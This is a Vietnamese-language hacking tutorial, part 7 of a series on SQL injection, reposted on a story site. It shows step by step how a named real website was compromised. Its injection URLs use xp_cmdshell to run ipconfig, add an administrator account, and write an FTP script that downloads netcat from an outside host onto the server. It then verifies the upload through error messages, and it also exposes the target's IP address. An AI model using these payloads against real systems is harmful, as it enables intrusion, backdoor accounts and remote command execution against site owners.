Anken - Tổng hợp về SQL Injection (bài 7) - Y!m: This_Love_No1
Tổng hợp về SQL Injection (bài 7)
XÁC ĐỊNH IP CỦA SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == "%")
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
DO THÁM IP "203.162.7.70"
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70 none)):
• 203.162.7.70 == panvietnam.com
FTP TRỰC TIẾP - THẤT BẠI !
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70 none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT LÊN SERVER
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
THẨM TRA XEM NETCAT ĐÃ ĐƯỢC UPLOAD THÀNH CÔNG CHƯA ?
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))-
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840 .
fantomas311(VNISS)
Bạn đang đọc truyện trên: AzTruyen.Top